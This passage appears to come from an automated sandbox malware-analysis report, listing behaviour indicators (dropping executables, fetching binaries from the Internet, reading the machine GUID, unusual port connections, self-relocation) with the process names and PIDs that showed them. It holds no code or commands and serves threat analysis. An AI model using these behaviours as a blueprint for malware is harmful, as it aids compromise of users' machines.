  - data64_1.exe (PID: 3236)
  - ms_updater.exe (PID: 696)
  - is-M2AQP.tmp (PID: 2920)
  - npp.exe (PID: 2260)
  - cryptedgolden123.exe (PID: 2504)
  - PCSupport.exe (PID: 3040)
  - is-6NB4B.tmp (PID: 2844)
  - 5d3e8177e87cc.exe (PID: 2320)
  - jsc.exe (PID: 2616)
  - Wattyl.exe (PID: 3244)
  - NBYS%20AH.NET.exe (PID: 1888)
  - svchost.exe (PID: 1072)
  - svchost.exe (PID: 3660)
  - stub.exe (PID: 3960)
  - stub.exe (PID: 2040)
  - stub.exe (PID: 1632)
  - stub.exe (PID: 3636)
  - winvnc.exe (PID: 1976)
  - stub.exe (PID: 3380)
  - stub.exe (PID: 2204)
  - stub.exe (PID: 3388)
  - stub.exe (PID: 392)
  - stub.exe (PID: 864)
  - stub.exe (PID: 2760)
  - stub.exe (PID: 2836)
  - stub.exe (PID: 2776)
  - stub.exe (PID: 3196)
  - stub.exe (PID: 3508)
  - stub.exe (PID: 2488)
  - stub.exe (PID: 2948)
  - stub.exe (PID: 3204)
  - stub.exe (PID: 2044)
  - stub.exe (PID: 2756)
  - stub.exe (PID: 2076)
  - stub.exe (PID: 3560)
  - stub.exe (PID: 1216)
  - stub.exe (PID: 3896)
  - stub.exe (PID: 3640)
  - stub.exe (PID: 680)
  - stub.exe (PID: 2564)
  - stub.exe (PID: 2000)
  - stub.exe (PID: 2832)
  - stub.exe (PID: 3372)
  - stub.exe (PID: 2796)
  - stub.exe (PID: 3364)
  - stub.exe (PID: 1268)
  - stub.exe (PID: 3484)
  - stub.exe (PID: 3292)
  - stub.exe (PID: 1196)
  - stub.exe (PID: 3864)
  - stub.exe (PID: 2160)
  - stub.exe (PID: 584)
  - stub.exe (PID: 1632)
  - stub.exe (PID: 764)
  - stub.exe (PID: 3816)
  - stub.exe (PID: 3288)
  - stub.exe (PID: 3624)
  - stub.exe (PID: 2852)
  - stub.exe (PID: 1936)
  - stub.exe (PID: 712)
  - stub.exe (PID: 3120)
  - stub.exe (PID: 3148)
  - stub.exe (PID: 2476)
  - stub.exe (PID: 3132)
  - stub.exe (PID: 2488)
  - stub.exe (PID: 3872)
  - stub.exe (PID: 3484)
  - stub.exe (PID: 3544)
  - stub.exe (PID: 124)
  - stub.exe (PID: 116)
  - stub.exe (PID: 3520)
  - stub.exe (PID: 1836)
  - stub.exe (PID: 764)
  - stub.exe (PID: 1596)
  - stub.exe (PID: 3900)
  - stub.exe (PID: 3640)
  - stub.exe (PID: 2688)
  - stub.exe (PID: 2576)
  - stub.exe (PID: 2988)
  - stub.exe (PID: 2796)
  - stub.exe (PID: 2812)
  - stub.exe (PID: 3056)
  - stub.exe (PID: 984)
  - stub.exe (PID: 2916)
  - stub.exe (PID: 2792)
  - stub.exe (PID: 2324)
  - stub.exe (PID: 1876)
  - stub.exe (PID: 3528)
  - stub.exe (PID: 2948)
  - stub.exe (PID: 584)
  - stub.exe (PID: 1344)
  - stub.exe (PID: 4036)
  - stub.exe (PID: 1924)
  - stub.exe (PID: 1864)
  - stub.exe (PID: 3444)
  - stub.exe (PID: 1892)
  - stub.exe (PID: 3044)
  - stub.exe (PID: 1808)
  - stub.exe (PID: 1936)
  - stub.exe (PID: 2988)
  - stub.exe (PID: 3364)
  - stub.exe (PID: 3084)
  - stub.exe (PID: 3632)
  - stub.exe (PID: 2804)
  - stub.exe (PID: 1812)
  - stub.exe (PID: 3100)
  - stub.exe (PID: 3004)
  - stub.exe (PID: 1548)
  - stub.exe (PID: 1404)
  - stub.exe (PID: 1904)
  - stub.exe (PID: 3840)
  - stub.exe (PID: 2044)
  - stub.exe (PID: 1780)
  - stub.exe (PID: 3900)
  - stub.exe (PID: 3444)
  - stub.exe (PID: 764)
  - stub.exe (PID: 2576)
  - stub.exe (PID: 2056)
  - stub.exe (PID: 392)
  - stub.exe (PID: 2108)
  - stub.exe (PID: 3196)
  - stub.exe (PID: 2912)
  - stub.exe (PID: 2176)
  - stub.exe (PID: 3056)
  - stub.exe (PID: 3156)
  - stub.exe (PID: 2324)
  - stub.exe (PID: 3432)
  - stub.exe (PID: 1560)
  - stub.exe (PID: 1860)
  - stub.exe (PID: 124)
  - stub.exe (PID: 3660)
  - stub.exe (PID: 3704)
  - stub.exe (PID: 3636)
  - stub.exe (PID: 1316)
  - stub.exe (PID: 3816)
  - stub.exe (PID: 2592)
  - stub.exe (PID: 2740)
  - stub.exe (PID: 2928)
  - stub.exe (PID: 680)
  - stub.exe (PID: 4004)
  - stub.exe (PID: 2812)
  - stub.exe (PID: 3064)
  - stub.exe (PID: 3508)
  - stub.exe (PID: 2804)
  - stub.exe (PID: 3124)
  - stub.exe (PID: 3468)
  - stub.exe (PID: 2324)
  - stub.exe (PID: 2260)
  - stub.exe (PID: 1560)
  - stub.exe (PID: 2480)
  - stub.exe (PID: 3520)
  - stub.exe (PID: 2088)
  - stub.exe (PID: 3528)
  - stub.exe (PID: 3736)
  - stub.exe (PID: 1236)
  - stub.exe (PID: 3764)
  - BestSoftware.exe (PID: 2384)
  - stub.exe (PID: 3964)
  - stub.exe (PID: 1892)
  - stub.exe (PID: 392)
  - stub.exe (PID: 2504)
  - stub.exe (PID: 884)
  - stub.exe (PID: 3364)
  - stub.exe (PID: 2760)
  - stub.exe (PID: 3140)
  - stub.exe (PID: 900)
  - stub.exe (PID: 3088)
  - stub.exe (PID: 3292)
  - stub.exe (PID: 2176)
  - stub.exe (PID: 3308)
  - stub.exe (PID: 1632)
  - stub.exe (PID: 3544)
  - stub.exe (PID: 1780)
  - stub.exe (PID: 1772)
  - stub.exe (PID: 1216)
  - stub.exe (PID: 1596)
  - stub.exe (PID: 864)
  - stub.exe (PID: 2744)
  - stub.exe (PID: 3552)
  - stub.exe (PID: 2988)
  - stub.exe (PID: 2836)
  - stub.exe (PID: 3872)
  - stub.exe (PID: 3136)
  - stub.exe (PID: 3492)
  - stub.exe (PID: 2320)
  - stub.exe (PID: 2296)
  - stub.exe (PID: 2488)
  - stub.exe (PID: 3100)
  - stub.exe (PID: 3404)
  - plink.exe (PID: 4036)
  - stub.exe (PID: 2448)
  - stub.exe (PID: 3596)
  - stub.exe (PID: 3640)
  - stub.exe (PID: 3520)
  - stub.exe (PID: 3044)
  - stub.exe (PID: 2788)
  - stub.exe (PID: 2796)
  - stub.exe (PID: 2776)
  - stub.exe (PID: 3068)
  - stub.exe (PID: 3064)
  - stub.exe (PID: 3196)
  - stub.exe (PID: 572)
  - stub.exe (PID: 3872)
  - stub.exe (PID: 900)
  - stub.exe (PID: 1196)
  - stub.exe (PID: 3088)
  - stub.exe (PID: 2260)
  - stub.exe (PID: 3004)
  - stub.exe (PID: 3432)
  - stub.exe (PID: 2068)
  - stub.exe (PID: 2080)
  - stub.exe (PID: 3536)
  - stub.exe (PID: 3764)
  - stub.exe (PID: 3964)
  - stub.exe (PID: 3788)
  - stub.exe (PID: 2788)
  - stub.exe (PID: 2740)
  - stub.exe (PID: 712)
  - stub.exe (PID: 2504)
  - stub.exe (PID: 2776)
  - stub.exe (PID: 2812)
  - stub.exe (PID: 3492)
  - stub.exe (PID: 2176)
  - stub.exe (PID: 3196)
  - stub.exe (PID: 3872)
  - stub.exe (PID: 3812)
  - stub.exe (PID: 3468)
  - stub.exe (PID: 3432)
  - stub.exe (PID: 2792)
  - stub.exe (PID: 1772)
  - stub.exe (PID: 2080)
  - stub.exe (PID: 3544)
  - stub.exe (PID: 3308)
  - stub.exe (PID: 1216)
  - stub.exe (PID: 548)
  - stub.exe (PID: 1820)
  - stub.exe (PID: 1924)
  - stub.exe (PID: 1584)
  - stub.exe (PID: 3368)
  - stub.exe (PID: 3132)
  - stub.exe (PID: 2912)
  - stub.exe (PID: 4048)
  - stub.exe (PID: 3632)
  - stub.exe (PID: 2360)
  - twty.exe (PID: 3656)
  - pdf.exe (PID: 2476)
  - v2.exe (PID: 3060)
  - vbc.exe (PID: 2792)
  - is-OUPR4.tmp (PID: 1656)
  - route.exe (PID: 2928)
  - savesinto.exe (PID: 2988)
  - RegSvcs.exe (PID: 1864)
  - taskeng.exe (PID: 3068)
  - wlanext.exe (PID: 5216)
  - 360TS_Setup_Mini_WW.Marketator.CPI20230401_6.6.0.1054.exe (PID: 5776)
  - RegSvcs.exe (PID: 5852)
  - InstallSetup9.exe (PID: 5916)
  - BroomSetup.exe (PID: 5936)
  - l.exe (PID: 6116)
  - PCclear_Eng_mini.exe (PID: 3444)
  - AppLaunch.exe (PID: 6108)
  - tungbot.exe (PID: 3164)
  - tungbot.exe (PID: 3536)
  - svchost.exe (PID: 5044)
  - Financials-05-16-23-PDF.exe (PID: 4760)
  - build.exe (PID: 1424)
  - clip.exe (PID: 4224)
  - Update.exe (PID: 4312)
  - SuburbansKamacite.exe (PID: 2368)
  - NBYS%20ASM.NET.exe (PID: 4616)
  - peinf.exe (PID: 5420)
  - 7zipFOPBACKEND.exe (PID: 4364)
  - pp.exe (PID: 3892)
  - Setup2010u32.exe (PID: 5136)
  - LEAJ.exe (PID: 4820)
  - Temp3.exe (PID: 5260)
  - PsExec.exe (PID: 4576)
  - SystemUpdate.exe (PID: 4556)
  - Windows Security Client.exe (PID: 5356)
  - ._cache_PsExec.exe (PID: 5564)
  - cryptedggggg.exe (PID: 5604)
  - bc_memories_from_the_mcp.exe (PID: 1632)
  - Synaptics.exe (PID: 956)
  - WinLocker.exe (PID: 6016)
  - cp.exe (PID: 1904)
  - _VTI_CNF.exe (PID: 4320)
  - flesh.exe (PID: 4404)
  - flt_shovemydiscoupyourarse.exe (PID: 4196)
  - vbc.exe (PID: 2800)
  - NINJA.exe (PID: 5000)
  - PluginFlash.exe (PID: 5296)
  - AdobeUpdateres.exe (PID: 3716)
  - qemu-ga.exe (PID: 4128)
  - is-4O8IH.tmp (PID: 2968)
  - svchost.exe (PID: 2848)
  - 11.exe (PID: 4360)
  - wab.exe (PID: 4136)
  - ghjkl.exe (PID: 2984)
  - WinScp.exe (PID: 4376)
  - new.exe (PID: 6036)
  - BLduscfibj.exe (PID: 4388)
  - BLduscfibj.exe (PID: 5092)
  - setuplll.exe (PID: 3380)
  - RegAsm.exe (PID: 4256)
  - InstallSetup3.exe (PID: 4604)
  - InstallSetup6.exe (PID: 4704)
  - pei.exe (PID: 4064)
  - KB824105-x86-ENU.exe (PID: 2960)
  - crypted.exe (PID: 5456)
  - easy.exe (PID: 4740)
  - taskeng.exe (PID: 4708)
  - more.exe (PID: 4220)
  - AppLaunch.exe (PID: 5404)
  - NXYBankAssist.exe (PID: 3928)
  - kb%5Efr_ouverture.exe (PID: 3940)
  - TaAgente.exe (PID: 3644)
  - inst77player_1.0.0.1.exe (PID: 3708)
  - 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe (PID: 6372)
  - crypted214124.exe (PID: 6440)
  - nszDC12.tmp (PID: 5452)
  - Opolis.exe (PID: 5004)
  - tpeinf.exe (PID: 6644)
  - system.exe (PID: 6784)
  - InstallSetup8.exe (PID: 6652)
  - }uqUir9@J.exe (PID: 7052)
  - }uqUir9@J.exe (PID: 7092)
  - buding.exe (PID: 4532)
  - WinDir.exe (PID: 7408)
  - pcidevicechecker.exe (PID: 1264)
- Reads the machine GUID from the registry
  - 4363463463464363463463463.bin.exe (PID: 2064)
  - 4363463463464363463463463.bin.exe (PID: 1844)
  - 4363463463464363463463463.bin.exe (PID: 452)
  - 4363463463464363463463463.bin.exe (PID: 2596)
  - 4363463463464363463463463.bin.exe (PID: 2524)
  - 4363463463464363463463463.bin.exe (PID: 3076)
  - 4363463463464363463463463.bin.exe (PID: 1028)
  - 4363463463464363463463463.bin.exe (PID: 3168)
  - 4363463463464363463463463.bin.exe (PID: 1816)
  - data64_5.exe (PID: 3644)
  - Wattyl.exe (PID: 3244)
  - ms_updater.exe (PID: 696)
  - data64_1.exe (PID: 3236)
  - npp.exe (PID: 2260)
  - Amdau.exe (PID: 3628)
  - jsc.exe (PID: 2616)
  - NBYS%20AH.NET.exe (PID: 1888)
  - plink.exe (PID: 4036)
  - pdf.exe (PID: 2476)
  - twty.exe (PID: 3656)
  - v2.exe (PID: 3060)
  - vbc.exe (PID: 2792)
  - BestSoftware.exe (PID: 2384)
  - RegSvcs.exe (PID: 1864)
  - savesinto.exe (PID: 2988)
  - taskeng.exe (PID: 3068)
  - RegSvcs.exe (PID: 5852)
  - l.exe (PID: 6116)
  - InstallSetup9.exe (PID: 5916)
  - AppLaunch.exe (PID: 6108)
  - PCclear_Eng_mini.exe (PID: 3444)
  - icsys.icn.exe (PID: 3308)
  - tungbot.exe (PID: 3536)
  - tungbot.exe (PID: 3164)
  - explorer.exe (PID: 5180)
  - spoolsv.exe (PID: 5204)
  - svchost.exe (PID: 5044)
  - spoolsv.exe (PID: 4240)
  - Financials-05-16-23-PDF.exe (PID: 4760)
  - build.exe (PID: 1424)
  - Update.exe (PID: 4312)
  - peinf.exe (PID: 5420)
  - SuburbansKamacite.exe (PID: 2368)
  - NBYS%20ASM.NET.exe (PID: 4616)
  - 7zipFOPBACKEND.exe (PID: 4364)
  - Temp3.exe (PID: 5260)
  - pp.exe (PID: 3892)
  - SystemUpdate.exe (PID: 4556)
  - PsExec.exe (PID: 4576)
  - Windows Security Client.exe (PID: 5356)
  - _VTI_CNF.exe (PID: 4320)
  - flesh.exe (PID: 4404)
  - PluginFlash.exe (PID: 5296)
  - AdobeUpdateres.exe (PID: 3716)
  - NINJA.exe (PID: 5000)
  - wab.exe (PID: 4136)
  - ghjkl.exe (PID: 2984)
  - WinScp.exe (PID: 4376)
  - BLduscfibj.exe (PID: 4388)
  - BLduscfibj.exe (PID: 5092)
  - RegAsm.exe (PID: 4256)
  - pei.exe (PID: 4064)
  - KB824105-x86-ENU.exe (PID: 2960)
  - easy.exe (PID: 4740)
  - taskeng.exe (PID: 4708)
  - new.exe (PID: 6036)
  - AppLaunch.exe (PID: 5404)
  - more.exe (PID: 4220)
  - TaAgente.exe (PID: 3644)
  - nszDC12.tmp (PID: 5452)
  - tpeinf.exe (PID: 6644)
  - 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe (PID: 6372)
  - NXYBankAssist.exe (PID: 3928)
  - }uqUir9@J.exe (PID: 7052)
  - buding.exe (PID: 4532)
  - wmlaunch.exe (PID: 7072)
  - }uqUir9@J.exe (PID: 7092)
  - pcidevicechecker.exe (PID: 1264)
  - WinDir.exe (PID: 7408)
- Reads Environment values
  - 4363463463464363463463463.bin.exe (PID: 2064)
  - 4363463463464363463463463.bin.exe (PID: 1844)
  - 4363463463464363463463463.bin.exe (PID: 452)
  - 4363463463464363463463463.bin.exe (PID: 2596)
  - 4363463463464363463463463.bin.exe (PID: 2524)
  - 4363463463464363463463463.bin.exe (PID: 3076)
  - 4363463463464363463463463.bin.exe (PID: 1028)
  - 4363463463464363463463463.bin.exe (PID: 3168)
  - 4363463463464363463463463.bin.exe (PID: 1816)
  - data64_5.exe (PID: 3644)
  - savesinto.exe (PID: 2988)
  - taskeng.exe (PID: 3068)
  - AppLaunch.exe (PID: 6108)
  - tungbot.exe (PID: 3536)
  - Financials-05-16-23-PDF.exe (PID: 4760)
  - build.exe (PID: 1424)
  - Setup2010u32.exe (PID: 5136)
  - 7zipFOPBACKEND.exe (PID: 4364)
  - Temp3.exe (PID: 5260)
  - Windows Security Client.exe (PID: 5356)
  - Update.exe (PID: 4312)
  - flesh.exe (PID: 4404)
  - WinScp.exe (PID: 4376)
  - RegAsm.exe (PID: 4256)
  - KB824105-x86-ENU.exe (PID: 2960)
  - taskeng.exe (PID: 4708)
  - TaAgente.exe (PID: 3644)
  - }uqUir9@J.exe (PID: 7092)
  - WinDir.exe (PID: 7408)
- Manual execution by a user
  - 4363463463464363463463463.bin.exe (PID: 1216)
  - 4363463463464363463463463.bin.exe (PID: 1816)
  - 4363463463464363463463463.bin.exe (PID: 1844)
  - 4363463463464363463463463.bin.exe (PID: 452)
  - 4363463463464363463463463.bin.exe (PID: 1924)
  - 4363463463464363463463463.bin.exe (PID: 2260)
  - 4363463463464363463463463.bin.exe (PID: 2596)
  - 4363463463464363463463463.bin.exe (PID: 2176)
  - 4363463463464363463463463.bin.exe (PID: 2524)
  - 4363463463464363463463463.bin.exe (PID: 2848)
  - 4363463463464363463463463.bin.exe (PID: 3076)
  - 4363463463464363463463463.bin.exe (PID: 1028)
  - 4363463463464363463463463.bin.exe (PID: 3044)
  - 4363463463464363463463463.bin.exe (PID: 3168)
  - 4363463463464363463463463.bin.exe (PID: 2248)
  - 4363463463464363463463463.bin.exe (PID: 3140)
- Drops the executable file immediately after the start
  - 4363463463464363463463463.bin.exe (PID: 2064)
  - 4363463463464363463463463.bin.exe (PID: 1816)
  - 4363463463464363463463463.bin.exe (PID: 1844)
  - 4363463463464363463463463.bin.exe (PID: 452)
  - 4363463463464363463463463.bin.exe (PID: 2596)
  - 4363463463464363463463463.bin.exe (PID: 2524)
  - 4363463463464363463463463.bin.exe (PID: 3076)
  - Wattyl.exe (PID: 3244)
  - tuc4.exe (PID: 3868)
  - is-SSOM8.tmp (PID: 3796)
  - pcidevicechecker.exe (PID: 572)
  - RegAsm.exe (PID: 1924)
  - tuc5.exe (PID: 980)
  - 4363463463464363463463463.bin.exe (PID: 3168)
  - 4363463463464363463463463.bin.exe (PID: 1028)
  - is-M2AQP.tmp (PID: 2920)
  - tuc6.exe (PID: 1992)
  - is-6NB4B.tmp (PID: 2844)
  - Amdau.exe (PID: 3628)
  - stub.exe (PID: 3284)
  - stub.exe (PID: 3960)
  - PCSupport.exe (PID: 3040)
  - stub.exe (PID: 2040)
  - v2.exe (PID: 3060)
  - tungbot.exe (PID: 3164)
  - explorer.exe (PID: 5180)
  - spoolsv.exe (PID: 5204)
  - icsys.icn.exe (PID: 3308)
  - svchost.exe (PID: 5044)
  - jet.exe (PID: 5360)
  - clip.exe (PID: 4224)
  - Setup2010u32.exe (PID: 5136)
  - Temp3.exe (PID: 5260)
  - twty.exe (PID: 3656)
  - PsExec.exe (PID: 4576)
  - WinLocker.exe (PID: 6016)
  - cp.exe (PID: 1904)
  - Synaptics.exe (PID: 956)
  - PluginFlash.exe (PID: 5296)
  - flesh.exe (PID: 4404)
  - NINJA.exe (PID: 5000)
  - adobe.exe (PID: 3156)
  - is-4O8IH.tmp (PID: 2968)
  - ghjkl.exe (PID: 2984)
  - sunset1.exe (PID: 4432)
  - buding.exe (PID: 4532)
  - BLduscfibj.exe (PID: 5092)
  - 11.exe (PID: 4360)
  - 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe (PID: 6372)
  - inst77player_1.0.0.1.exe (PID: 3708)
  - InstallSetup9.exe (PID: 5916)
  - dialer.exe (PID: 4124)
  - hvthvjgfr6tyghgdtrtyigkhvjggft.exe (PID: 7800)
  - more.exe (PID: 4220)
  - dllhost.exe (PID: 6272)
  - latestbuild.exe (PID: 3900)
  - newbuild.exe (PID: 6072)
  - Opolis.exe (PID: 5004)
  - jxszdjp.exe (PID: 7592)
  - jxszdjpSrv.exe (PID: 7744)
  - lve.exe (PID: 7140)
  - more.exe (PID: 6716)
  - 288c47bbc187122b439df19ff4df68f076.exe (PID: 7528)
  - Project_8.exe (PID: 5764)
  - BelgiumchainAGRO.exe (PID: 4848)
  - Archevod_XWorm.exe (PID: 2644)
  - fd432592b959b22401bce262763b192065a90e3f.exe (PID: 6184)
  - svchost.com (PID: 7856)
  - buildz.exe (PID: 9776)
  - %E6%9A%97%E5%B7%B7%E8%A7%86%E9%A2%91%E8%A7%A3%E6%9E%90%E5%8A%A9%E6%89%8B.exe (PID: 9664)
  - buildz.exe (PID: 10228)
  - msiexec.exe (PID: 10096)
  - ransom_builder.exe (PID: 5540)
  - Helper.exe (PID: 9924)
  - loader.exe (PID: 8432)
  - smell-the-roses.exe (PID: 2544)
  - rhsgn_protected.exe (PID: 8684)
  - fund.exe (PID: 5188)
  - iexplore.exe (PID: 7720)
  - newbuild.exe (PID: 9012)
  - ARA.exe (PID: 9536)
  - a3e34cb.exe (PID: 4936)
  - srr.exe (PID: 7952)
  - conhost.exe (PID: 2072)
  - route.exe (PID: 6632)
  - df0RM20.exe (PID: 2928)
  - xD6Km33.exe (PID: 6492)
  - love.exe (PID: 7920)
- Process requests binary or script from the Internet
  - 4363463463464363463463463.bin.exe (PID: 1816)
  - 4363463463464363463463463.bin.exe (PID: 1844)
  - 4363463463464363463463463.bin.exe (PID: 452)
  - 4363463463464363463463463.bin.exe (PID: 2596)
  - 4363463463464363463463463.bin.exe (PID: 2524)
  - 4363463463464363463463463.bin.exe (PID: 2064)
  - 4363463463464363463463463.bin.exe (PID: 3076)
  - 4363463463464363463463463.bin.exe (PID: 1028)
  - 4363463463464363463463463.bin.exe (PID: 3168)
  - npp.exe (PID: 2260)
  - PCSupport.exe (PID: 3040)
- Connects to the server without a host name
  - 4363463463464363463463463.bin.exe (PID: 1844)
  - 4363463463464363463463463.bin.exe (PID: 2064)
  - 4363463463464363463463463.bin.exe (PID: 1028)
  - 4363463463464363463463463.bin.exe (PID: 3168)
  - 4363463463464363463463463.bin.exe (PID: 1816)
  - 4363463463464363463463463.bin.exe (PID: 452)
  - 4363463463464363463463463.bin.exe (PID: 3076)
- Create files in a temporary directory
  - 4363463463464363463463463.bin.exe (PID: 2596)
  - tuc4.exe (PID: 3868)
  - is-SSOM8.tmp (PID: 3796)
  - tuc5.exe (PID: 980)
  - is-M2AQP.tmp (PID: 2920)
  - npp.exe (PID: 2260)
  - tuc6.exe (PID: 1992)
  - is-6NB4B.tmp (PID: 2844)
  - stub.exe (PID: 3960)
  - twty.exe (PID: 3656)
  - is-OUPR4.tmp (PID: 1656)
  - tuc2.exe (PID: 2692)
  - taskeng.exe (PID: 3068)
  - wlanext.exe (PID: 5216)
  - powershell.exe (PID: 5576)
  - v2.exe (PID: 3060)
  - InstallSetup9.exe (PID: 5916)
  - 360TS_Setup_Mini_WW.Marketator.CPI20230401_6.6.0.1054.exe (PID: 5776)
  - l.exe (PID: 6116)
  - icsys.icn.exe (PID: 3308)
  - tungbot.exe (PID: 3164)
  - spoolsv.exe (PID: 5204)
  - explorer.exe (PID: 5180)
  - svchost.exe (PID: 5044)
  - spoolsv.exe (PID: 4240)
  - jet.exe (PID: 5360)
  - clip.exe (PID: 4224)
  - Setup2010u32.exe (PID: 5136)
  - pp.exe (PID: 3892)
  - cp.exe (PID: 1904)
  - Synaptics.exe (PID: 956)
  - peinf.exe (PID: 5420)
  - vbc.exe (PID: 2800)
  - NINJA.exe (PID: 5000)
  - adobe.exe (PID: 3156)
  - is-4O8IH.tmp (PID: 2968)
  - 11.exe (PID: 4360)
  - ghjkl.exe (PID: 2984)
  - sunset1.exe (PID: 4432)
  - WinScp.exe (PID: 4376)
  - buding.exe (PID: 4532)
  - pei.exe (PID: 4064)
  - inst77player_1.0.0.1.exe (PID: 3708)
  - 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe (PID: 6372)
  - Opolis.exe (PID: 5004)
  - tpeinf.exe (PID: 6644)
  - WinDir.exe (PID: 7408)
- Checks proxy server information
  - Wattyl.exe (PID: 3244)
  - data64_1.exe (PID: 3236)
  - npp.exe (PID: 2260)
  - jsc.exe (PID: 2616)
  - plink.exe (PID: 4036)
  - twty.exe (PID: 3656)
  - InstallSetup9.exe (PID: 5916)
  - 360TS_Setup_Mini_WW.Marketator.CPI20230401_6.6.0.1054.exe (PID: 5776)
  - PCclear_Eng_mini.exe (PID: 3444)
  - peinf.exe (PID: 5420)
  - pp.exe (PID: 3892)
  - _VTI_CNF.exe (PID: 4320)
  - AdobeUpdateres.exe (PID: 3716)
  - wab.exe (PID: 4136)
  - pei.exe (PID: 4064)
  - AppLaunch.exe (PID: 5404)
  - 11.exe (PID: 4360)
  - 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe (PID: 6372)
  - nszDC12.tmp (PID: 5452)
  - tpeinf.exe (PID: 6644)
  - NXYBankAssist.exe (PID: 3928)
  - buding.exe (PID: 4532)
  - }uqUir9@J.exe (PID: 7092)
  - pcidevicechecker.exe (PID: 1264)
- Application launched itself
  - data64_5.exe (PID: 3204)
  - toolspub2.exe (PID: 4072)
  - powershell.exe (PID: 5576)
  - ghjkl.exe (PID: 2984)
  - BLduscfibj.exe (PID: 4388)
  - }uqUir9@J.exe (PID: 7052)
  - StringIds.exe (PID: 7640)
  - InstallUtil.exe (PID: 7840)
  - 2k.exe (PID: 7812)
  - more.exe (PID: 4220)
  - Gsoymaq.exe (PID: 6720)
  - buildz.exe (PID: 9444)
  - buildz.exe (PID: 9904)
  - buildz.exe (PID: 9776)
  - msiexec.exe (PID: 10096)
  - build2.exe (PID: 8296)
  - toolspub2.exe (PID: 8624)
  - Ghxyq.exe (PID: 8752)
  - soft.exe (PID: 8628)
- Creates files or folders in the user directory
  - Wattyl.exe (PID: 3244)
  - is-SSOM8.tmp (PID: 3796)
  - RegAsm.exe (PID: 1924)
  - is-M2AQP.tmp (PID: 2920)
  - PCSupport.exe (PID: 3040)
  - is-6NB4B.tmp (PID: 2844)
  - Amdau.exe (PID: 3628)
  - npp.exe (PID: 2260)
  - is-OUPR4.tmp (PID: 1656)
  - wlanext.exe (PID: 5216)
  - twty.exe (PID: 3656)
  - Windows Security Client.exe (PID: 5356)
  - _VTI_CNF.exe (PID: 4320)
  - PluginFlash.exe (PID: 5296)
  - flesh.exe (PID: 4404)
  - NINJA.exe (PID: 5000)
  - peinf.exe (PID: 5420)
  - is-4O8IH.tmp (PID: 2968)
  - BLduscfibj.exe (PID: 5092)
  - InstallSetup9.exe (PID: 5916)
  - AdobeUpdateres.exe (PID: 3716)
  - 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe (PID: 6372)
  - dialer.exe (PID: 4124)
- Drops 7-zip archiver for unpacking
  - is-SSOM8.tmp (PID: 3796)
  - is-M2AQP.tmp (PID: 2920)
  - is-6NB4B.tmp (PID: 2844)
  - is-4O8IH.tmp (PID: 2968)
  - hvthvjgfr6tyghgdtrtyigkhvjggft.exe (PID: 7800)
  - msiexec.exe (PID: 10096)
  - conhost.exe (PID: 2072)
- Process drops legitimate windows executable
  - 4363463463464363463463463.bin.exe (PID: 2064)
  - is-SSOM8.tmp (PID: 3796)
  - is-M2AQP.tmp (PID: 2920)
  - is-6NB4B.tmp (PID: 2844)
  - stub.exe (PID: 3284)
  - is-4O8IH.tmp (PID: 2968)
  - Archevod_XWorm.exe (PID: 2644)
  - rhsgn_protected.exe (PID: 8684)
  - 4363463463464363463463463.bin.exe (PID: 1816)
  - love.exe (PID: 7920)
  - df0RM20.exe (PID: 2928)
  - 4363463463464363463463463.bin.exe (PID: 3076)
  - xD6Km33.exe (PID: 6492)
- Creates files in the program directory
  - pcidevicechecker.exe (PID: 572)
  - twty.exe (PID: 3656)
  - pcidevicechecker.exe (PID: 1264)
  - clip.exe (PID: 4224)
  - PsExec.exe (PID: 4576)
  - cp.exe (PID: 1904)
  - AdobeUpdateres.exe (PID: 3716)
- Connects to unusual port
  - ms_updater.exe (PID: 696)
  - 4363463463464363463463463.bin.exe (PID: 1844)
  - 4363463463464363463463463.bin.exe (PID: 1816)
  - 4363463463464363463463463.bin.exe (PID: 452)
  - vbc.exe (PID: 2792)
  - RegSvcs.exe (PID: 1864)
  - twty.exe (PID: 3656)
  - rise.exe (PID: 3240)
  - RegSvcs.exe (PID: 5852)
  - tungbot.exe (PID: 3536)
  - build.exe (PID: 1424)
  - Recorder.exe (PID: 4188)
  - Windows Security Client.exe (PID: 5356)
  - flesh.exe (PID: 4404)
  - 4363463463464363463463463.bin.exe (PID: 3168)
  - easy.exe (PID: 4740)
  - pcidevicechecker.exe (PID: 1264)
  - NXYBankAssist.exe (PID: 3928)
- Executes as Windows Service
  - svchost.exe (PID: 1072)
  - Gsoymaq.exe (PID: 6720)
  - VSSVC.exe (PID: 2100)
  - Ghxyq.exe (PID: 8752)
- Starts itself from another location
  - stub.exe (PID: 2040)
  - svchost.com (PID: 2080)
  - stub.exe (PID: 1632)
  - svchost.com (PID: 1864)
  - stub.exe (PID: 3636)
  - svchost.com (PID: 3736)
  - stub.exe (PID: 864)
  - stub.exe (PID: 3380)
  - svchost.com (PID: 3288)
  - svchost.com (PID: 3900)
  - stub.exe (PID: 2204)
  - svchost.com (PID: 2576)
  - stub.exe (PID: 3388)
  - svchost.com (PID: 1956)
  - stub.exe (PID: 392)
  - svchost.com (PID: 3128)
  - svchost.com (PID: 900)
  - svchost.com (PID: 712)
  - stub.exe (PID: 2760)
  - stub.exe (PID: 2836)
  - svchost.com (PID: 3124)
  - stub.exe (PID: 3196)
  - svchost.com (PID: 3088)
  - stub.exe (PID: 3508)
  - stub.exe (PID: 2776)
  - svchost.com (PID: 1424)
  - stub.exe (PID: 2488)
  - stub.exe (PID: 2948)
  - svchost.com (PID: 2260)
  - svchost.com (PID: 2916)
  - svchost.com (PID: 1860)
  - stub.exe (PID: 3204)
  - svchost.com (PID: 3660)
  - stub.exe (PID: 2044)
  - stub.exe (PID: 2756)
  - stub.exe (PID: 2076)
  - svchost.com (PID: 1632)
  - stub.exe (PID: 3560)
  - svchost.com (PID: 1864)
  - stub.exe (PID: 1216)
  - svchost.com (PID: 3564)
  - svchost.com (PID: 3816)
  - stub.exe (PID: 3896)
  - stub.exe (PID: 3640)
  - svchost.com (PID: 2384)
  - svchost.com (PID: 3764)
  - svchost.com (PID: 2736)
  - stub.exe (PID: 2000)
  - svchost.com (PID: 2576)
  - stub.exe (PID: 680)
  - svchost.com (PID: 392)
  - stub.exe (PID: 2564)
  - stub.exe (PID: 2796)
  - svchost.com (PID: 2760)
  - stub.exe (PID: 2832)
